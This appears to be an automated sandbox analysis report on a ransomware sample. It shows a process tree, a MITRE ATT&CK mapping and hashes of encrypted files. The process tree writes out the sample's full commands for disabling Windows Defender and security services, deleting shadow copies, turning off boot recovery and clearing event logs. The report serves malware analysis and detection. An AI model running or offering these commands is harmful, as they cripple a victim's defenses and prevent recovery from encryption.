description	pid	Process	procid_target
PID 2192 wrote to memory of 2404	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	31
PID 2192 wrote to memory of 2404	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	31
PID 2192 wrote to memory of 2404	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	31
PID 2404 wrote to memory of 816	2404	net.exe	33
PID 2404 wrote to memory of 816	2404	net.exe	33
PID 2404 wrote to memory of 816	2404	net.exe	33
PID 2192 wrote to memory of 2280	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	34
PID 2192 wrote to memory of 2280	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	34
PID 2192 wrote to memory of 2280	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	34
PID 2280 wrote to memory of 2792	2280	net.exe	36
PID 2280 wrote to memory of 2792	2280	net.exe	36
PID 2280 wrote to memory of 2792	2280	net.exe	36
PID 2192 wrote to memory of 2936	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	37
PID 2192 wrote to memory of 2936	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	37
PID 2192 wrote to memory of 2936	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	37
PID 2936 wrote to memory of 2448	2936	net.exe	39
PID 2936 wrote to memory of 2448	2936	net.exe	39
PID 2936 wrote to memory of 2448	2936	net.exe	39
PID 2192 wrote to memory of 2452	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	40
PID 2192 wrote to memory of 2452	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	40
PID 2192 wrote to memory of 2452	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	40
PID 2452 wrote to memory of 2720	2452	net.exe	42
PID 2452 wrote to memory of 2720	2452	net.exe	42
PID 2452 wrote to memory of 2720	2452	net.exe	42
PID 2192 wrote to memory of 2804	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	43
PID 2192 wrote to memory of 2804	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	43
PID 2192 wrote to memory of 2804	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	43
PID 2804 wrote to memory of 2884	2804	net.exe	45
PID 2804 wrote to memory of 2884	2804	net.exe	45
PID 2804 wrote to memory of 2884	2804	net.exe	45
PID 2192 wrote to memory of 2896	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	46
PID 2192 wrote to memory of 2896	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	46
PID 2192 wrote to memory of 2896	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	46
PID 2896 wrote to memory of 2772	2896	net.exe	48
PID 2896 wrote to memory of 2772	2896	net.exe	48
PID 2896 wrote to memory of 2772	2896	net.exe	48
PID 2192 wrote to memory of 3020	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	49
PID 2192 wrote to memory of 3020	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	49
PID 2192 wrote to memory of 3020	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	49
PID 3020 wrote to memory of 2908	3020	net.exe	51
PID 3020 wrote to memory of 2908	3020	net.exe	51
PID 3020 wrote to memory of 2908	3020	net.exe	51
PID 2192 wrote to memory of 2620	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	52
PID 2192 wrote to memory of 2620	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	52
PID 2192 wrote to memory of 2620	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	52
PID 2620 wrote to memory of 2912	2620	net.exe	54
PID 2620 wrote to memory of 2912	2620	net.exe	54
PID 2620 wrote to memory of 2912	2620	net.exe	54
PID 2192 wrote to memory of 2732	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	55
PID 2192 wrote to memory of 2732	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	55
PID 2192 wrote to memory of 2732	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	55
PID 2192 wrote to memory of 2948	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	57
PID 2192 wrote to memory of 2948	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	57
PID 2192 wrote to memory of 2948	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	57
PID 2192 wrote to memory of 2752	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	59
PID 2192 wrote to memory of 2752	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	59
PID 2192 wrote to memory of 2752	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	59
PID 2192 wrote to memory of 2504	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	61
PID 2192 wrote to memory of 2504	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	61
PID 2192 wrote to memory of 2504	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	61
PID 2192 wrote to memory of 2616	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	63
PID 2192 wrote to memory of 2616	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	63
PID 2192 wrote to memory of 2616	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	63
PID 2192 wrote to memory of 2656	2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe	65

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2192
- C:\Windows\system32\net.exe
  net.exe stop "NetMsmqActivator" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NetMsmqActivator" /y
    3⤵
    PID:816
- C:\Windows\system32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:2792
- C:\Windows\system32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:2448
- C:\Windows\system32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:2720
- C:\Windows\system32\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:2884
- C:\Windows\system32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:2772
- C:\Windows\system32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:2908
- C:\Windows\system32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:2912
- C:\Windows\system32\sc.exe
  sc.exe config "NetMsmqActivator" start= disabled
  2⤵
  - Launches sc.exe
  PID:2732
- C:\Windows\system32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:2948
- C:\Windows\system32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:2752
- C:\Windows\system32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:2504
- C:\Windows\system32\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  - Launches sc.exe
  PID:2616
- C:\Windows\system32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:2656
- C:\Windows\system32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:2168
- C:\Windows\system32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:2276
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:696
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:800
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender DisableAntiSpyware settings
  PID:2996
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:2848
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:2876
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2952
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2840
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2328
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:796
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2852
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:1984
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:1944
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:1896
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:1640
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:1576
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2092
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:2148
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:2064
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:320
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1648
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:1484
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:108
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:1524
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:3036
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1036
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1116
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:2360
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:3044
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:448
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:1548
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:960
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:1584
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:2416
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:588
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:844
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:772
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:572
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:892
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:620
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:1676
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2216
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:2772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2908
- C:\Windows\system32\notepad.exe
  notepad.exe C:\ib68_HOW_TO_DECRYPT.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1000
- C:\Windows\system32\cmd.exe
  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe"
  2⤵
  - Deletes itself
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2524
- - C:\Windows\system32\PING.EXE
    ping.exe -n 5 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_OFF.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
341B

MD5
f4393bdb40865ebd0eddf5a27b87ddbd

SHA1
823b5e046d08576ac33517eaa93c61665edbb65c

SHA256
87ff13b6c9f725a3fb2e5c8ef524cc5819601e2d8331822333087a72dd035efb

SHA512
73a1db5a02928e2f903ffae6c477e7ce3d313048a0faf2216eeb9183db9e7406c2abfd8e36861f5a8a96eca220fe2d6a7771b84820ce27df232c944e56b62257

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_ON.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
222B

MD5
a875cf9caadc406392ad4bbde44fd55c

SHA1
847e6491a3699254781e581f107becea8812ffe5

SHA256
fff5db9fafe7d0264df2c4135ca0a6252f4f4bddfc7b62471c2cca0a3fbf5954

SHA512
5b2bbdb377737bd4892e41ad1127b5767af9d7d873300d065190d03e7a130810290bdd44500a01758c1305b7e0d50bfa5694dc188f60aabbff5a9f679fc4c036

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
114B

MD5
b8fbbc73ddde31636552ab184b4e398f

SHA1
5cfbfaea56e979a07c083f2340b10a5894812d78

SHA256
3c3702253a4695b5bcb18a2565b1d49f9f32f5f9f2442fd1395197970fa34edb

SHA512
7f0f4b098e0d37ed403be8d54e2dcbc603791ddf00e3a21747c41ecfb829fdf664b6bddda8d51309e1229b197244a1d8ae23e1b3bf3348f99f84a7a8684db8d7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_K_COL.HXK.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
113B

MD5
db9742e49c49c505b293a84518e95fa5

SHA1
406dae0b226900aad2ad2e10d8366651b848c053

SHA256
1c17b95e5098adb0c0e06aac8a8c7c50c6a5ef1b696465d548c8a922f1d3a653

SHA512
974917a72b2b3b783bb0ffcbfe0058489ae65ac0aa71ae86d77195780aeb7800848a3158fbe7ad8ddf9b30145d8a1a2c66f72484305ccf363b7981f105be295b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\BUTTON.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
185B

MD5
973779cfa96b0be367e8718db325c4ba

SHA1
be1115e7d145c8181f82b66ed30b4d5dc60bdfb7

SHA256
09d2a546c57dc9fec8fd5efd059ab8e7e21d51f582fd678f05900efef154db0a

SHA512
baba3c85e1f49e2f3b1c26f3db0cedd7a340a67c8fd5ab80e70957418d658bf137ec32fe529c01f122b932a3961fd4739eb557588d239471aa84cdfe99aa9dfa

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v

Filesize
496B

MD5
94f8f9cbbc7c55b6035f08f846d39cee

SHA1
2dad7a9174aea6a26301a00a7d3277595cfdca8f

SHA256
f1b55bf40b6fa794c1e614aa75985258a88e2165bef91eff545438b85baa5c3f

SHA512
6dabc2f1cc7872cff3682bb1d4e852d97e69cc7ae232dc9dbbb0fb3333bc3e3d99e9e2a2478cce03875abf9d2f27be964220586ae146af41484f78c98509c53c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_ON.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
1KB

MD5
52236cec3798df288705441118df4bcc

SHA1
1fd595c15b27c07a7185cc39bcbf66c52641e32c

SHA256
71e4d48ed4515f17faa6505256314a8d6022e103714193785e7fcd08a36a051d

SHA512
0c949c6cf7c1d61978ae838e266c845cb9990ae574d6f1e80d96c5f87db15bca354aa4499ea80fa7fb47c8734b0db55d581b8e8cda07e1664423f957ef5f91e7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.NO.XML.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v

Filesize
806B

MD5
fc9a01384283f760b245bafde02893ca

SHA1
27787bad85297baad51216df565e409dfac1d440

SHA256
7bdb5be38475510a7c05a3444b122a62e8cf4c05b35e656ca4deccce4a55d968

SHA512
a35db9e5336b752fdd25db32ee0584fcd93c9c366ab3119d1e5cdd235c8f77e44170fdf2ce6c182d02df750ed89b85926c2cf4bfd4b4f6d634ec0c20c100c0e0

Download Submit
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\ib68_HOW_TO_DECRYPT.txt

Filesize
1KB

MD5
62cec2ff784f0d9b4f4c9abfa336abac

SHA1
13563e5cd88426ed6afd3479b4c37014db2ee82d

SHA256
6bd413d05aea770c42df58583a1c58a432fd9ceeee14808d8869aff19fdab464

SHA512
36c61384e85d514b76ed4e4e0c57dced1c2be3db58fdef868f4b01642ee8846d548134052017051d2131993cf2142bf9930c7aa95f3c85676996dc40c4412408

Download Submit
C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
5KB

MD5
80de7d23775915f54b70810b46c6256f

SHA1
5cdd530157830bfe3c44dc1822c39bf1f0ecb57d

SHA256
c125fe293b02f582120211b317fa89c0b4cd1115015b67781fa449fb94cdbaf0

SHA512
a014b4c1155f976d5c7f585a62fd29f5a73cb94e1497f5e6e3b25a9f82f6fcdda4463b73e23401c6cc34e34f618ea320f01694106f5256069349d6e54996789b

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
57B

MD5
adf99b54fd6f317b611320564167c305

SHA1
d3d80dd39b686e04bf31db6ac9335084e841ef73

SHA256
1b68454d53e781f8793547fde8fcb2f3b03b5c8134f37b9d8c4045cb8a5473f3

SHA512
65fb44cdaf01632d60ecf3b49ab1eb661982ee8b6a430dcf6d1e75789787c9e7356754cd071421ca44a1b32ab918be97a630b1b0ca722383eea56d40fa131642

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
12KB

MD5
73938ad405b694259dd656dafa3e8e12

SHA1
726f1f98335c195683de3f8940f3c39f6d3e89ed

SHA256
9aa0bb52893742b15edda6ce15dee700c4d7116dcf8663a8be43c09a743f0833

SHA512
f41b3852c0c0ec0c5a42090712df59897f8071ef3f2565fd3b5c5693f376dc0e33b413d47b86039a0696b0f748343423e30a76ada068d61651985e46c87c11eb

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
8KB

MD5
5c28d0a3a2796e5f2252babe8e41c3f1

SHA1
c14115ae253e01245fabfdcd4c976f069be790f2

SHA256
baeff41622370d8e31bc5f0110d3bbab1f4cc03e21e3ca084e29d0afa5857cb5

SHA512
ae8dcb640623de699cc92d9fd66f3ba0f9334faaecb68a18294c9143efb6182d2df06495df1e680e07f0bb8f62a321343bc8ba1b115e68cbafe71d8974ac2262

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v

Filesize
7KB

MD5
